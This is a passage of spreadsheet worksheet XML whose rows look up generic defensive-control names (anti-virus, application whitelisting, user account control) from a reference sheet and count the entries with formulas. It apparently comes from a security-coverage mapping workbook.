    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="16" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="45" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C126" s="17">
        <v>0</v>
      </c>
      <c r="D126" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E126" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F126" s="50"/>
      <c r="G126" s="19"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="16" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="45" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C127" s="17">
        <v>100</v>
      </c>
      <c r="D127" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E127" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F127" s="50"/>
      <c r="G127" s="19"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="16" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="45" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:H)</f>
        <v>Application control</v>
      </c>
      <c r="C128" s="17">
        <v>100</v>
      </c>
      <c r="D128" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E128" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="50"/>
      <c r="G128" s="19"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="16" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="45" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C129" s="17">
        <v>0</v>
      </c>
      <c r="D129" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E129" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F129" s="50"/>
      <c r="G129" s="19"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="16" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="45" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C130" s="17">
        <v>0</v>
      </c>
      <c r="D130" s="45">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E130" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F130" s="50"/>
      <c r="G130" s="19"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="16" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="45" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C131" s="17">
        <v>100</v>
      </c>
      <c r="D131" s="45">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E131" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F131" s="50"/>
      <c r="G131" s="19"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="16" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="45" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C132" s="17">
        <v>0</v>
      </c>
      <c r="D132" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E132" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F132" s="50"/>
      <c r="G132" s="19"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="16" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="45" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C133" s="17">
        <v>0</v>
      </c>
      <c r="D133" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E133" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F133" s="50"/>
      <c r="G133" s="19"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="16" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="45" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C134" s="17">
        <v>0</v>
      </c>
      <c r="D134" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="50"/>
      <c r="G134" s="19"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="16" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="45" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:H)</f>
        <v>Windows User Account Control,System access controls,File system access controls,Heuristic Detection,Host forensic analysis</v>
      </c>
      <c r="C135" s="17">
        <v>0</v>
      </c>
      <c r="D135" s="45">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E135" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F135" s="50"/>
      <c r="G135" s="19"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="16" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="45" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C136" s="17">
        <v>0</v>
      </c>
      <c r="D136" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E136" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F136" s="50"/>
      <c r="G136" s="19"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="16" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="45" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C137" s="17">
        <v>0</v>
      </c>
      <c r="D137" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E137" s="45">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F137" s="50"/>
      <c r="G137" s="19"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="16" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="45" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C138" s="17">
        <v>0</v>
      </c>
      <c r="D138" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E138" s="45">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F138" s="50"/>
      <c r="G138" s="19"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="16" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="45" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C139" s="17">
        <v>0</v>
      </c>
      <c r="D139" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E139" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F139" s="50"/>
      <c r="G139" s="19"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="16" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="45" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C140" s="17">
        <v>0</v>
      </c>
      <c r="D140" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E140" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F140" s="50"/>
      <c r="G140" s="19"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="16" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="45" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D141" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E141" s="45">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F141" s="50"/>
      <c r="G141" s="19"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="16" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="45" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C142" s="17">
        <v>0</v>
      </c>
      <c r="D142" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E142" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F142" s="50"/>
      <c r="G142" s="19"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="16" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="45" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C143" s="17">
        <v>0</v>
      </c>
      <c r="D143" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E143" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F143" s="50"/>
      <c r="G143" s="19"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="16" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="45" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C144" s="17">
        <v>0</v>
      </c>
      <c r="D144" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E144" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="50"/>
      <c r="G144" s="19"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="16" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="45" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C145" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D145" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E145" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F145" s="50"/>
      <c r="G145" s="19"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="16" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="45" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C146" s="17">
        <v>0</v>
      </c>
      <c r="D146" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E146" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="50"/>
      <c r="G146" s="19"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="16" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="45" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C147" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D147" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E147" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="50"/>
      <c r="G147" s="19"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="16" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="45" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C148" s="17">
        <v>0</v>
      </c>
      <c r="D148" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E148" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F148" s="50"/>
      <c r="G148" s="19"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="16" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="45" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C149" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D149" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E149" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F149" s="50"/>
      <c r="G149" s="19"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="16" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="45" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D150" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="50"/>
      <c r="G150" s="19"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="16" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="45" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D151" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="50"/>
      <c r="G151" s="19"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="16" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="45" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C152" s="17">
        <v>0</v>
      </c>
      <c r="D152" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E152" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F152" s="50"/>
      <c r="G152" s="19"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="16" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="45" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D153" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="50"/>
      <c r="G153" s="19"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="16" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="45" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C154" s="17">
        <v>0</v>
      </c>
      <c r="D154" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E154" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F154" s="50"/>
      <c r="G154" s="19"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="16" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="45" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C155" s="17">
        <v>0</v>
      </c>
      <c r="D155" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E155" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F155" s="50"/>
      <c r="G155" s="19"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="16" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="45" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C156" s="17">
        <v>0</v>
      </c>
      <c r="D156" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E156" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F156" s="50"/>
      <c r="G156" s="19"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="16" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="45" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C157" s="17">
        <v>0</v>
      </c>
      <c r="D157" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E157" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F157" s="50"/>
      <c r="G157" s="19"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="16" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="45" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C158" s="17">
        <v>0</v>
      </c>
      <c r="D158" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E158" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="50"/>
      <c r="G158" s="19"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="16" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="45" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C159" s="17">
        <v>100</v>
      </c>
      <c r="D159" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E159" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F159" s="50"/>
      <c r="G159" s="19"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="16" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="45" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C160" s="17">
        <v>0</v>
      </c>
      <c r="D160" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E160" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F160" s="50"/>
      <c r="G160" s="19"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="16" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="45" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C161" s="17">
        <v>0</v>
      </c>
      <c r="D161" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E161" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F161" s="50"/>
      <c r="G161" s="19"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="16" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="45" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C162" s="17">
        <v>0</v>
      </c>
      <c r="D162" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E162" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F162" s="50"/>
      <c r="G162" s="19"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="16" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="45" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C163" s="17">
        <v>0</v>
      </c>
      <c r="D163" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E163" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F163" s="50"/>
      <c r="G163" s="19"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="16" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="45" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C164" s="17">
        <v>0</v>
      </c>
      <c r="D164" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E164" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F164" s="50"/>
      <c r="G164" s="19"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="16" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="45" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E165" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="50"/>
      <c r="G165" s="19"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="16" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="45" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C166" s="17">
        <v>0</v>
      </c>
      <c r="D166" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E166" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F166" s="50"/>
      <c r="G166" s="19"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="16" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="45" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C167" s="17">
        <v>0</v>
      </c>
      <c r="D167" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E167" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F167" s="50"/>
      <c r="G167" s="19"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="16" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="45" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C168" s="17">
        <v>0</v>
      </c>
      <c r="D168" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E168" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="50"/>
      <c r="G168" s="19"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="16" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="45" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C169" s="17">
        <v>0</v>
      </c>
      <c r="D169" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E169" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F169" s="50"/>
      <c r="G169" s="19"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="16" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="45" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C170" s="17">
        <v>0</v>
      </c>
      <c r="D170" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E170" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="50"/>
      <c r="G170" s="19"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="16" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="45" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C171" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D171" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E171" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="50"/>
      <c r="G171" s="19"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="16" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="45" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C172" s="17">
        <v>0</v>
      </c>
      <c r="D172" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E172" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F172" s="50"/>
      <c r="G172" s="19"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="16" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="45" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C173" s="17">
        <v>0</v>
      </c>
      <c r="D173" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E173" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F173" s="50"/>
      <c r="G173" s="19"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="16" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="45" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C174" s="17">
        <v>0</v>
      </c>
      <c r="D174" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E174" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F174" s="50"/>
      <c r="G174" s="19"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="16" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="45" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C175" s="17">
        <v>0</v>
      </c>
      <c r="D175" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E175" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F175" s="50"/>
      <c r="G175" s="19"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="16" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="45" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C176" s="17">
        <v>0</v>
      </c>
      <c r="D176" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E176" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F176" s="50"/>
      <c r="G176" s="19"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="16" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="45" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C177" s="17">
        <v>0</v>
      </c>
      <c r="D177" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E177" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F177" s="50"/>
      <c r="G177" s="19"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="16" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="45" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C178" s="17">
        <v>0</v>
      </c>
      <c r="D178" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E178" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F178" s="50"/>
      <c r="G178" s="19"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="16" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="45" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C179" s="17">
        <v>0</v>
      </c>
      <c r="D179" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E179" s="45">
